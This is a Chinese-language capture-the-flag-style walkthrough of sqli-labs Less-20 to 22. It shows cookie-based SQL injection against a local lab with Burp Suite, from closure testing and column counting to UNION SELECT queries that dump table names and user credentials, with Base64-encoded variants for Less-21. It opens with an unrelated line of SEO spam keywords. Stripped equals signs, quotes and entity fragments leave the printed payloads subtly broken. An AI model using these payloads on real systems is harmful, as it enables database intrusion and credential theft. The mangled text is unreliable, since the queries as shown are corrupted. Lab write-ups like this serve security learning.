手机商城+手机网站建设多少钱,百度网盘网页版登录首页,手机上编程软件,58同城上海网站建设COOKIE 作用#xff1a;是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件#xff0c;它和你的网络行为有关#xff0c;记录了当前用户的状态 形式#xff1a;keyvalue 例如#xff1a;当我们登录某个账号后#xff0c;服务器会在cookies进行记录 个人理解#xf…COOKIE 作用是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件它和你的网络行为有关记录了当前用户的状态 形式keyvalue 例如当我们登录某个账号后服务器会在cookies进行记录 个人理解当我们登录一个网站后。setcookie函数根据我们登录的账户及密码加上获取当前时间等其他信息来生成一个cookie当我们再次访此页面不需要重新登入只需要比对cookie信息比如在less-20中cookie根据uname生成然后用cookie中的信息来比对数据库中的uname如果正确容许访问。负责拒绝
less-20
首先登入一个账号模拟登入下的注入 登入后用bp抓包
GET /sq/Less-20/index.php HTTP/1.1
Host: 192.168.140.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/png,image/svgxml,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.140.130/sq/Less-20/index.php
Connection: keep-alive
Cookie:unameadmin
Upgrade-Insecure-Requests: 1
Priority: u0, i发现相较于之前没有了post提交的表单信息而是ookie:unameadmin 发包页面回显 页面有cookie信息和name及password 当我们发包时数据库提取cookie的uname与数据库的uname进行比较。 于是我们便可以在cookie处进行注入
闭合方式 GET /sq/Less-20/index.php HTTP/1.1 Host: 192.168.140.130 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/png,image/svgxml,/;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate, br Referer: http://192.168.140.130/sq/Less-20/index.php Connection: keep-alive Cookie:unameadmin or 11 # Upgrade-Insecure-Requests: 1 Priority: u0, i 在cookie处多次尝试确定闭合方式为,方法与前面关卡寻找闭合方式一样。
列数 Cookie:unameadmin’ order by 5 # Cookie:unameadmin’ order by 4 # Cookie:unameadmin’ order by 3 # 列数为3
回显位 Cookie:unameadminaWE’ union select 1,2,3 # 记得uname为假值来显示union查询的值 报数据 所有表Cookie:unameadminaWE’ union select 1,group_concat(schema_name),3 from information_schema.schemata# security的所有表Cookie:unameadminaWE’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()# users表的所有列Cookie:unameadminaWE’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schemadatabase() and table_name‘users’# 数据Cookie:unameadminaWE’ union select 1,group_concat(username,password),3 from security.users # less-21
本关卡当我们登入的时候发现页面显示 这里cookie变成了不认识的符号我们复制过去百度一下
发现这是一种编码为Base64编码熟悉的热相信一眼便可以看出来于是我们不难猜测这是将前端表单信息进行编码上传到后端解码在进行比对 所以本关与less-20一致只不过对cookie进行了Base64编码我们在进行注入的时候可以先将语句写出来进行编码然后在bp中进行注入
闭合方式
构造语句并进行编码 在bp注入 回显 不难看出闭合方式为).
报数据 所有表Cookie:unameadminaWE’) union select 1,group_concat(schema_name),3 from information_schema.schemata# 编码YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoc2NoZW1hX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEj security的所有表 Cookie:unameadminaWE’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()# 编码 YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj users表的所有列 Cookie:unameadminaWE’) union select 1,group_concat(column_name),3 from information_schema.columns where table_schemadatabase() and table_name‘users’# 编码 YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0ndXNlcnMnIw 数据 Cookie:unameadminaWE’) union select 1,group_concat(username,password),3 from security.users # 编码 YWRtaW5hV0UnKSB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpLDMgZnJvbSBzZWN1cml0eS51c2VycyAj less-22
我们发现本关卡也对cookie进行了编码当我们注入时发现页面没有回显当时页面有报错所以使用报错注入extractvalueupdatexmlfloor都可以使用闭合方式为.没有其他变化所以不做过多演示如果有需要可以留言我会将我的语句放在评论区
